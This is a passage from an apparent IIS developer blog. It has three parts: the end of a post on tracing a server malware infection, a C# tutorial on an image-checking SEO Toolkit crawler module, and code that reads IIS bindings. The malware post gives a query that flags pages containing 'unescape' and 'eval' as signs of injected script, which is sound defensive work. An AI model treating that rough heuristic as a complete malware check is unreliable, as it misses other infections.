    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With a big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file for ErrorDocument and that would show them which files were infected and if it was a problem in their application or the server.

    Case Closed

    Turns out that after they went back to their Hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me quickly identify this based on the fact that is able to see the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of things in a lot simpler ways, but for Beta 1 for those who cares here is the query that you can save in an XML file and use "Open Query" to see if you are infected with these malware.

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
     
    <filter>
       
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
        <
    expression field="FileContents" operator="Contains" value="unescape" />
        <
    expression field="FileContents" operator="Contains" value="eval" />
      </
    filter>
     
    <displayFields>
       
    <field name="URL" />
        <
    field name="StatusCode" />
        <
    field name="Title" />
        <
    field name="Description" />
      </
    displayFields>
    </query>
  • CarlosAg Blog

    IIS SEO Toolkit – Crawler Module Extensibility

    • 27 Comments

     

    Sample SEO Toolkit CrawlerModule Extensibility

    In this blog we are going to write an example on how to extend the SEO Toolkit functionality, so for that we are going to pretend our company has a large Web site that includes several images, and now we are interested in making sure all of them comply to a certain standard, lets say all of them should be smaller than 1024x768 pixels and that the quality of the images is no less than 16 bits per pixel. Additionally we would also like to be able to make custom queries that can later allow us to further analyze the contents of the images and filter based on directories and more.

    For this we will extend the SEO Toolkit crawling process to perform the additional processing for images, we will be adding the following new capabilities:

    1. Capture additional information from the Content. In this case we will capture information about the image, in particular we will extend the report to add a "Image Width", "Image Height" and a "Image Pixel Format".
    2. Flag additional violations. In this example we will flag three new violations:
      1. Image is too large. This violation will be flagged any time the content length of the image is larger than the "Maximum Download Size per URL" configured at the start of the analysis. It will also flag this violation if the resolution is larger than 1024x768.
      2. Image pixel format is too small. This violation will be flagged if the image is 8 or 4 bits per pixel.
      3. Image has a small resolution. This will be flagged if the image resolution per inch is less than 72dpi.

    Enter CrawlerModule

    A crawler module is a class that extends the crawling process in Site Analysis to provide custom functionality while processing each URL. By deriving from this class you can easily raise your own set of violations or add your own data and links to any URL.

    public abstract class CrawlerModule : IDisposable
    {
       
    // Methods
       
    public virtual void BeginAnalysis();
        public virtual void EndAnalysis(bool cancelled);
       
    public abstract void Process(CrawlerProcessContext context);

       
    // Properties
        protected WebCrawler Crawler { get; }
       
    protected CrawlerSettings Settings { get; }
    }

    It includes three main methods:

    1. BeginAnalysis. This method is invoked once at the beginning of the crawling process and allows you to perform any initialization needed. Common tasks include registering custom properties in the Report that can be accessed through the Crawler property.
    2. Process. This method is invoked for each URL once its contents has been downloaded. The context argument includes a property URLInfo that provides all the metadata extracted for the URL. It also includes a list of Violations and Links in the URL. Common tasks include augmenting the metadata of the URL whether using its contents or external systems, flagging new custom Violations, or discovering new links in the contents.
    3. EndAnalysis. This method is invoked once at the end of the crawling process and allows you to do any final calculations on the report once all the URLs have been processed. Common tasks in this method include performing aggregations of data across all the URLs, or identifying violations that depend on all the data being available (such as finding duplicates).

    Coding the Image Crawler Module

    Create a Class Library in Visual Studio and add the code shown below.

    1. Open Visual Studio and select the option File->New Project
    2. In the New Project dialog select the Class Library project template and specify a name and a location such as "SampleCrawlerModule"
    3. Using the Menu "Project->Add Reference", add a reference to the IIS SEO Toolkit client library (C:\Program Files\Reference Assemblies\Microsoft\IIS\Microsoft.Web.Management.SEO.Client.dll).
    4. Since we are going to be registering this through the IIS Manager extensibility, add a reference to the IIS Manager extensibility DLL (c:\windows\system32\inetsrv\Microsoft.Web.Management.dll) using the "Project->Add Reference" menu.
    5. Also, since we will be using the .NET Bitmap class you need to add a reference to "System.Drawing" using the "Project->Add Reference" menu.
    6. Delete the auto-generated Class1.cs since we will not be using it.
    7. Using the Menu "Project->Add New Item" Add a new class named "ImageExtension".
    using System;
    using System.Drawing;
    using System.Drawing.Imaging;
    using Microsoft.Web.Management.SEO.Crawler;

    namespace SampleCrawlerModule {

       
    /// <summary>
        /// Extension to add validation and metadata to images while crawling
        /// </summary>
        internal class ImageExtension : CrawlerModule {
           
    private const string ImageWidthField = "iWidth";
           
    private const string ImageHeightField = "iHeight";
           
    private const string ImagePixelFormatField = "iPixFmt";

           
    public override void BeginAnalysis() {
               
    // Register the properties we want to augment at the begining of the analysis
                Crawler.Report.RegisterProperty(ImageWidthField, "Image Width", typeof(int));
               
    Crawler.Report.RegisterProperty(ImageHeightField, "Image Height", typeof(int));
               
    Crawler.Report.RegisterProperty(ImagePixelFormatField, "Image Pixel Format", typeof(string));
           
    }

           
    public override void Process(CrawlerProcessContext context) {
               
    // Make sure only process the Content Types we need to
                switch (context.UrlInfo.ContentTypeNormalized) {
                   
    case "image/jpeg":
                   
    case "image/png":
                   
    case "image/gif":
                   
    case "image/bmp":
                       
    // Process only known content types
                        break;
                   
    default:
                       
    // Ignore any other
                        return;
               
    }

               
    //--------------------------------------------
                // If the content length of the image was larger than the max
                //   allowed to download, then flag a violation, and stop
                if (context.UrlInfo.ContentLength >
                   
    Crawler.Settings.MaxContentLength) {
                   
    Violations.AddImageTooLargeViolation(context,
                        "It is larger than the allowed download size"
    );
                   
    // Stop processing since we do not have all the content
                    return;
               
    }

               
    // Load the image from the response into a bitmap
                using (Bitmap bitmap = new Bitmap(context.UrlInfo.ResponseStream)) {
                   
    Size size = bitmap.Size;

                   
    //--------------------------------------------
                    // Augment the metadata by adding our fields
                    context.UrlInfo.SetPropertyValue(ImageWidthField, size.Width);
                   
    context.UrlInfo.SetPropertyValue(ImageHeightField, size.Height);
                   
    context.UrlInfo.SetPropertyValue(ImagePixelFormatField, bitmap.PixelFormat.ToString());

                   
    //--------------------------------------------
                    // Additional Violations:
                    //
                    // If the size is outside our standards, then flag violation
                    if (size.Width > 1024 &&
                       
    size.Height > 768) {
                       
    Violations.AddImageTooLargeViolation(context,
                           
    String.Format("The image size is: {0}x{1}",
                                         
    size.Width, size.Height));
                   
    }

                   
    // If the format is outside our standards, then flag violation
                    switch (bitmap.PixelFormat) {
                       
    case PixelFormat.Format1bppIndexed:
                       
    case PixelFormat.Format4bppIndexed:
                       
    case PixelFormat.Format8bppIndexed:
                           
    Violations.AddImagePixelFormatSmall(context);
                           
    break;
                   
    }

                   
    if (bitmap.VerticalResolution <= 72 ||
                       
    bitmap.HorizontalResolution <= 72) {
                       
    Violations.AddImageResolutionSmall(context,
                           
    bitmap.HorizontalResolution + "x" + bitmap.VerticalResolution);
                   
    }
               
    }
           
    }

           
    /// <summary>
            /// Helper class to hold the violations
            /// </summary>
            private static class Violations {

               
    private static readonly ViolationInfo ImageTooLarge =
                   
    new ViolationInfo("ImageTooLarge",
                                     
    ViolationLevel.Warning,
                                      "Image is too large."
    ,
                                      "The Image is too large: {details}."
    ,
                                      "Make sure that the image content is required."
    ,
                                      "Images"
    );

               
    private static readonly ViolationInfo ImagePixelFormatSmall =
                   
    new ViolationInfo("ImagePixelFormatSmall",
                                     
    ViolationLevel.Warning,
                                      "Image pixel format is too small."
    ,
                                      "The Image pixel format is too small"
    ,
                                      "Make sure that the quality of the image is good."
    ,
                                      "Images"
    );

               
    private static readonly ViolationInfo ImageResolutionSmall =
                   
    new ViolationInfo("ImageResolutionSmall",
                                     
    ViolationLevel.Warning,
                                      "Image resolution is small."
    ,
                                      "The Image resolution is too small: ({res})"
    ,
                                      "Make sure that the image quality is good."
    ,
                                      "Images"
    );

               
    internal static void AddImageTooLargeViolation(CrawlerProcessContext context, string details) {
                   
    context.Violations.Add(new Violation(ImageTooLarge,
                           
    0, "details", details));
               
    }

               
    internal static void AddImagePixelFormatSmall(CrawlerProcessContext context) {
                   
    context.Violations.Add(new Violation(ImagePixelFormatSmall, 0));
               
    }

               
    internal static void AddImageResolutionSmall(CrawlerProcessContext context, string resolution) {
                   
    context.Violations.Add(new Violation(ImageResolutionSmall,
                           
    0, "res", resolution));
               
    }
           
    }
       
    }
    }

    As you can see in the BeginAnalysis the module registers three new properties with the Report using the Crawler property. This is only required if you want to provide either a custom text or use it for different type other than a string. Note that current version only allows primitive types like Integer, Float, DateTime, etc.

    During the Process method it first makes sure that it only runs for known content types, then it performs any validations raising a set of custom violations that are defined in the Violations static helper class. Note that we load the content from the Response Stream, which is the property that contains the received from the server. Note that if you were analyzing text the property Response would contain the content (this is based on Content Type, so HTML, XML, CSS, etc, will be kept in this String property).

    Registering it

    When running inside IIS Manager, crawler modules need to be registered as a standard UI module first and then inside their initialization they need to be registered using the IExtensibilityManager interface. In this case to keep the code as simple as possible everything is added in a single file. So add a new file called "RegistrationCode.cs" and include the contents below:

    using System;
    using Microsoft.Web.Management.Client;
    using Microsoft.Web.Management.SEO.Crawler;
    using Microsoft.Web.Management.Server;

    namespace SampleCrawlerModule {
       
    internal class SampleCrawlerModuleProvider : ModuleProvider {
           
    public override ModuleDefinition GetModuleDefinition(IManagementContext context) {
               
    return new ModuleDefinition(Name, typeof(SampleCrawlerModule).AssemblyQualifiedName);
           
    }

           
    public override Type ServiceType {
               
    get { return null; }
           
    }

           
    public override bool SupportsScope(ManagementScope scope) {
               
    return true;
           
    }
       
    }

       
    internal class SampleCrawlerModule : Module {
           
    protected override void Initialize(IServiceProvider serviceProvider, ModuleInfo moduleInfo) {
               
    base.Initialize(serviceProvider, moduleInfo);

               
    IExtensibilityManager em = (IExtensibilityManager)GetService(typeof(IExtensibilityManager));
               
    em.RegisterExtension(typeof(CrawlerModule), new ImageExtension());
           
    }
       
    }
    }

    This code defines a standard UI IIS Manager module and in its client-side initialize method it uses the IExtensibilityManager interface to register the new instance of the Image extension. This will make it visible to the Site Analysis feature.

    Testing it

    To test it we need to add the UI module to Administration.config, that also means that the assembly needs to be registered in the GAC.

    To Strongly name the assembly

    In Visual Studio, you can do this easily by using the menu "Project->Properties", and select the "Signing" tab, check the "Sign the assembly", and choose a file, if you don't have one you can easily just choose New and specify a name.

    After this you can compile and now should be able to add it to the GAC.

    To GAC it

    If you have the SDK's you should be able to call it like in my case:

    "\Program Files\Microsoft SDKs\Windows\v6.0A\bin\gacutil.exe" /if SampleCrawlerModule.dll

     

    (Note, you could also just open Windows Explorer, navigate to c:\Windows\assembly and drag & drop your file in there, that will GAC it automatically).

    Finally to see the right name that should be use in Administration.config run the following command:

    "\Program Files\Microsoft SDKs\Windows\v6.0A\bin\gacutil.exe" /l SampleCrawlerModule

    In my case it displays:

    SampleCrawlerModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=6f4d9863e5b22f10, …

    Finally register it in Administration.config

    Open Administration.config in Notepad using an elevated instance, find the </moduleProviders> and add a string like the one below but replacing the right values for Version and PublicKeyToken:

          <add name="SEOSample" type="SampleCrawlerModule.SampleCrawlerModuleProvider, SampleCrawlerModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=6f4d9863e5b22f10" />

    Use it

    After registration you now should be able to launch IIS Manager and navigate to Search Engine Optimization. Start a new Analysis to your Web site. Once completed if there are any violations you will see them correctly in the Violations Summary or any other report. For example see below all the violations in the "Images" category.

    image

    Since we also extended the metadata by including the new fields (Image Width, Image Height, and Image Pixel Format) now you can use them with the Query infrastructure to easily create a report of all the images:

    image

    And since they are standard fields, they can be used in Filters, Groups, and any other functionality, including exporting data. So for example the following query can be opened in the Site Analysis feature and will display an average of the width and height of images summarized by type of image:

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
     
    <filter>
       
    <expression field="ContentTypeNormalized" operator="Begins" value="image/" />
      </
    filter>
     
    <group>
       
    <field name="ContentTypeNormalized" />
      </
    group>
     
    <displayFields>
       
    <field name="ContentTypeNormalized" />
        <
    field name="(Count)" />
        <
    field name="Average(iWidth)" />
        <
    field name="Average(iHeight)" />
      </
    displayFields>
    </query>

    image

    And of course violation details are shown as specified, including Recommendation, Description, etc:

    image

    Summary

    As you can see extending the SEO Toolkit using a Crawler Module allows you to provide additional information, whether Metadata, Violations or Links to any document being processed. This can be used to add support for content types not supported out-of-the box such as PDF, Office Documents or anything else that you need. It also can be used to extend the metadata by writing custom code to wire data from other system into the report giving you the ability to exploit this data using the Query capabilities of Site Analysis.

  • CarlosAg Blog

    Get IIS bindings at runtime without being an Administrator

    • 3 Comments

    Today there was a question in StackOverflow asking whether it was possible to read the IIS binding information such as Port and Protocols from the ASP.NET application itself to try to handle redirects from HTTP to HTTPS in a way that was reliable without worrying about using different ports than 80/443.

    Turns out this is possible in the context of the IIS worker process by using Microsoft.Web.Administration.

    The following function will take care of that by reading the Worker Process isolated configuration file and find the HTTP based bindings.

        private static IEnumerable<KeyValuePair<string, string>> GetBindings(HttpContext context) {
           
    // Get the Site name 
            string siteName = System.Web.Hosting.HostingEnvironment.SiteName;

           
    // Get the sites section from the AppPool.config
            Microsoft.Web.Administration.ConfigurationSection sitesSection =
               
    Microsoft.Web.Administration.WebConfigurationManager.GetSection(null, null, "system.applicationHost/sites");
            
           
    foreach (Microsoft.Web.Administration.ConfigurationElement site in sitesSection.GetCollection()) {
               
    // Find the right Site
                if (String.Equals((string)site["name"], siteName, StringComparison.OrdinalIgnoreCase)) {

                   
    // For each binding see if they are http based and return the port and protocol
                    foreach (Microsoft.Web.Administration.ConfigurationElement binding in site.GetCollection("bindings")) {
                       
    string protocol = (string)binding["protocol"];
                       
    string bindingInfo = (string)binding["bindingInformation"];

                       
    if (protocol.StartsWith("http", StringComparison.OrdinalIgnoreCase)) {
                           
    string[] parts = bindingInfo.Split(':');
                           
    if (parts.Length == 3) {
                               
    string port = parts[1];
                               
    yield return new KeyValuePair<string, string>(protocol, port);
                           
    }
                       
    }
                   
    }
               
    }
           
    }
       
    }

     

    If you want to try it, you could use the following page, just save it as test.aspx and add the function above, the result is a simple table that shows the protocol and port to be used:

    <%@ Page Language="C#" %>
    <%@ Import Namespace="System.Collections.Generic" %>
    <script runat="server">
       
    protected void Page_Load(object sender, EventArgs e) {
           
    Response.Write("<table border='1'>");
           
    foreach (KeyValuePair<string, string> binding in GetBindings(this.Context)) {
               
    Response.Write("<tr><td>");
               
    Response.Write(binding.Key);
               
    Response.Write("</td><td>");
               
    Response.Write(binding.Value);
               
    Response.Write("</td></tr>");
           
    }
           
    Response.Write("</table>");
       
    }
    </script>



    Also, you will need to add Microsoft.Web.Administration to your compilation assemblies inside the web.config for it to work:

    <?xml version="1.0"?>
    <configuration>
      
    <system.web>
        
    <compilation debug="true">
          
    <assemblies>
            
    <add assembly="Microsoft.Web.Administration, Version=7.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"/>
          </
    assemblies>
        
    </compilation>
      
    </system.web>
    </configuration>
Page 2 of 10 (93 items) 12345»